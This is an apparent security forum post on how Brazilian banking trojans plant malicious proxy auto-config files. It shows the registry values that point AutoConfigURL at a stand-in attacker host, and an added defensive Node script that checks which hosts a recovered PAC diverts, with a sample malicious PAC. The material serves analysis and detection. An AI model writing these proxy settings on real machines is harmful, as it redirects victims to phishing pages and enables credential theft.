PAC - the Problem Auto Config

MalwareVirus (thread author), Oct 6, 2012
Proxy auto-config (PAC) files are a modern resource that exists on all modern browsers. They define how web browsers and other user agents can automatically choose the appropriate proxy server (access method) to fetch a given URL.

Although PAC is a legitimate feature, the abuse of PAC files has been known since 2005. The technique was improved and refined by Brazilian cybercriminals, and then it was shared with cybercriminals from Turkey and Russia.

These attacks have reached a hitherto unseen level of complexity and effectiveness, making it possible to use a 1 KB file to hack an entire bank account. Combining a lot of creativity with drive-by download attacks, these malicious scripts can do more than simple man-in-the-middle raids; they are able to impersonate HTTPS connections in silent, web-based attacks which can be launched regularly and successfully. Generally these redirect users to the phishing pages of banks, credit card companies, etc.

In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.
Today at least 6 out of 10 Brazilian Trojan bankers have a feature which can add a malicious PAC to the browser’s config.

This attack is very simple; all a Trojan needs to do is to change this single value in the Windows Registry, adding a URL to the PAC file:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: AutoConfigURL = http://www.badsite.com/pacscript.pac

Or adding a path to a small file (generally less than 1 KB), hosted locally:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: AutoConfigURL = file://C:/WINDOWS/proxy.pac

Some attacks also change the values of the key below, which is responsible for setting an auto-proxy in the Internet connection’s name:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\{CONNECTION NAME}
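
A defender-side triage example, added here and not part of the original post or the article it quotes: once the PAC file named in AutoConfigURL has been recovered, this evaluates its FindProxyForURL for a watchlist of hosts and reports which ones are sent through a proxy instead of DIRECT. The function names, the helper stubs, the sample PAC and the watchlist are assumptions made for the example.

```javascript
// Added example: which hosts does a PAC script divert to a proxy?
// Node's vm module is not a security boundary; analyse real samples only in an isolated VM.
const vm = require('vm');

// Minimal stand-ins for the standard PAC helpers. DNS helpers are stubbed so nothing hits the network.
const pacHelpers = {
  shExpMatch: (str, pat) => new RegExp('^' + pat.replace(/[.+^${}()|[\]\\]/g, '\\$&')
    .replace(/\*/g, '.*').replace(/\?/g, '.') + '$').test(str),
  dnsDomainIs: (host, domain) => host.toLowerCase().endsWith(domain.toLowerCase()),
  isPlainHostName: (host) => !host.includes('.'),
  localHostOrDomainIs: (host, hostdom) => host === hostdom || hostdom.startsWith(host + '.'),
  dnsResolve: () => null,
  isInNet: () => false,
  myIpAddress: () => '127.0.0.1',
};

// Evaluate FindProxyForURL for each host and return those not routed DIRECT.
function divertedHosts(pacSource, hosts) {
  const context = vm.createContext({ ...pacHelpers });
  vm.runInContext(pacSource, context, { timeout: 1000 });
  const findings = [];
  for (const host of hosts) {
    const call = `FindProxyForURL(${JSON.stringify('https://' + host + '/')}, ${JSON.stringify(host)})`;
    const route = String(vm.runInContext(call, context, { timeout: 1000 })).trim();
    if (!/^DIRECT$/i.test(route)) findings.push({ host, route });
  }
  return findings;
}

// Proxying a handful of hosts while everything else goes DIRECT is the pattern to escalate.
function isSelective(pacSource, hosts) {
  const n = divertedHosts(pacSource, hosts).length;
  return n > 0 && n < hosts.length;
}

// Constructed sample (reserved .example names, TEST-NET address), not taken from a real campaign.
const samplePac = `
function FindProxyForURL(url, host) {
  if (shExpMatch(host, "*.bank.example") || host == "bank.example")
    return "PROXY 203.0.113.10:8080";
  return "DIRECT";
}`;
const watchlist = ['www.bank.example', 'bank.example', 'news.example'];
console.log(divertedHosts(samplePac, watchlist), isSelective(samplePac, watchlist));
```

A PAC that proxies every host (a typical corporate setup) or none is not flagged by isSelective; the watchlist should mix sensitive sites with unrelated ones so the contrast is visible.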

